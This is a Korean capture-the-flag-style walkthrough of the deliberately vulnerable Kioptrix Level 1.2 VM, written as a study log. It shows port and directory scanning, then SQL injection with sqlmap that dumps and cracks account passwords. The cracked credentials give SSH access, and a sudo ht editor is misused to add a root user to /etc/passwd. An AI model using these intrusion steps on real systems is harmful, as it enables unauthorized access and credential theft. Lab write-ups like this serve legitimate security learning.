초보자가 가득한 시큐리티 엔지니어를 목표로 하기 위해 공부한 비망록이 되기 때문에 잘못되어 있는 일이 있을지도 모릅니다.
vulnhub의 의도적으로 취약성이 만들어진 Kioptrix Level3의 Walkthrough가 됩니다.

vulnhub 정보

이름
Kioptrix: Level 1.2 (#3)


Date release
18 Apr 2011

작성자
Kioptrix

시리즈
Kioptrix

웹 페이지
h tp // w w. 버섯 ptx. 이 m/bぉg/? p=358

PortScan:

ssh 및 Apache가 시작된 것 같습니다.


서비스
VERSION


ssh
OpenSSH 4.7p1 데비안 8ubuntu1.2 (protocol 2.0)

http
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch

root@kali:~# nmap -sS -sV 192.168.56.77
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 17:13 JST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns 
Nmap scan report for 192.168.56.77
Host is up (0.00050s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 08:00:27:94:85:21 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.83 seconds

Enumeration:

웹 서버의 dir을 확인합니다.gallery/gallery.php 에 액세스했을 때 sql 주입이 발생했습니다.
화상의 읽어들이기가 잘 되지 않았기 때문에 hosts 의 설치를 행하고 있습니다.

root@kali:~# dirb http://kioptrix3.com/gallery/ -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May 10 17:41:34 2020
URL_BASE: http://kioptrix3.com/gallery/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://kioptrix3.com/gallery/ ----
+ http://kioptrix3.com/gallery/g.php (CODE:500|SIZE:3143)                                              
+ http://kioptrix3.com/gallery/gallery.php (CODE:200|SIZE:1654)                                        
+ http://kioptrix3.com/gallery/index.php (CODE:500|SIZE:5651)                                          
+ http://kioptrix3.com/gallery/login.php (CODE:500|SIZE:1998)                                          
+ http://kioptrix3.com/gallery/logout.php (CODE:500|SIZE:2085)                                         
+ http://kioptrix3.com/gallery/p.php (CODE:500|SIZE:1483)                                              
+ http://kioptrix3.com/gallery/photos.php (CODE:500|SIZE:1483)                                         
+ http://kioptrix3.com/gallery/profile.php (CODE:500|SIZE:1560)                                        
+ http://kioptrix3.com/gallery/recent.php (CODE:500|SIZE:2441)                                         
+ http://kioptrix3.com/gallery/register.php (CODE:500|SIZE:725)                                        
+ http://kioptrix3.com/gallery/search.php (CODE:500|SIZE:725)                                          
+ http://kioptrix3.com/gallery/slideshow.php (CODE:500|SIZE:725)                                       
+ http://kioptrix3.com/gallery/tags.php (CODE:500|SIZE:3212)                                           
+ http://kioptrix3.com/gallery/vote.php (CODE:200|SIZE:32)                                             

-----------------
END_TIME: Sun May 10 17:41:39 2020
DOWNLOADED: 4612 - FOUND: 14

다른 페이지에서 gallery.php의 sql 주입을 발생시키는 매개 변수를 찾는 것, id에서 발생하는 것으로 나타났습니다.

gallery/gallery.php?id=1&sort=views#photos

Exploitation:

이번에는 sqlmap를 사용합니다.
이번에, 덧붙여서 sqlmap 를 사용하지 않는 판도 씁니다.

root@kali:~# sqlmap -url kioptrix3.com/gallery/gallery.php?id=test --dbs
[17:50:43] [INFO] fetching database names
[17:50:43] [INFO] used SQL query returns 3 entries
[17:50:43] [INFO] retrieved: 'information_schema'
[17:50:43] [INFO] retrieved: 'gallery'
[17:50:43] [INFO] retrieved: 'mysql'
available databases [3]:                                                                               
[*] gallery
[*] information_schema
[*] mysql

root@kali:~# sqlmap -url kioptrix3.com/gallery/gallery.php?id=test -D gallery --dump

do you want to use common password suffixes? (slow!) [y/N] y
[17:55:02] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[17:55:02] [INFO] starting 2 processes 
[17:55:32] [INFO] cracked password 'Mast3r' for user 'dreg'                                            
[17:55:40] [INFO] cracked password 'starwars' for user 'loneferret'                                    
Database: gallery                                                                                      
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

사용자 ID와 비밀번호를 알았으므로 ssh를 시도해 보면 연결할 수있었습니다.

kali@kali:~$ ssh [email protected]
[email protected] password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:                                                              
http://help.ubuntu.com/
Last login: Sun May 10 13:59:26 2020 from 192.168.56.65
loneferret@Kioptrix3:~$ 

Privilege Escalation:

여러가지 조사하고 있으면 CompanyPolicy.README 라는 것을 발견했습니다.sudo ht 가 암호 없이 사용할 수 있는 것 같습니다.

loneferret@Kioptrix3:~$ cat CompanyPolicy.README                                                                                                                                                                                           
Hello new employee,                                                                                                                                                                                                                        
It is company policy here to use our newly installed software for editing, creating and viewing files.                                                                                                                                     
Please use the command 'sudo ht'.                                                                                                                                                                                                          
Failure to do so will result in you immediate termination.                                                                                                                                                                                 

DG
CEO

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ 

sudo 에서 실행했는데 xterm 에서 오류가 발생했기 때문에 수정했습니다.

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht              
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm-color
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht

이번에는 /etc/passwd에 사용자를 추가합니다.
ht로 추가하기 전에 openssl 로 패스워드 해시를 작성합니다.
작성이 끝나면 ht에서 /etc/passwd에 사용자를 만들고,su 에서 사용자를 변경하기만 하면 됩니다.

root@kali:~# openssl passwd -1 -salt hoge pass123
$1$hoge$7LUHELCYa/UiDzW5z823E1

무사히 권한 승격할 수 있었습니다.

root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt 
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Was not that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~# 

면책 조항

본 기사는 정보 보안에 있어서의 공격의 이해, 방위의 스킬 향상을 목적으로 한 보안에 관한 내용이 있습니다. 본 기사의 내용을 사용하여 발생한 어떠한 손해나 손실에 대해서, 본 기사 작성자는 일절의 책임을 지지 않습니다.
본 기사의 내용을 실제로 사용하여 제3자의 개인이나 조직 등을 공격한 경우는 법률에 의해 처벌될 가능성이 있으므로 반드시 자신이 소유하고 있는 환경만을 대상으로 하여 타인이나 조직 가 소유하고 있는 환경은 결코 대상으로 하지 않도록 부탁합니다.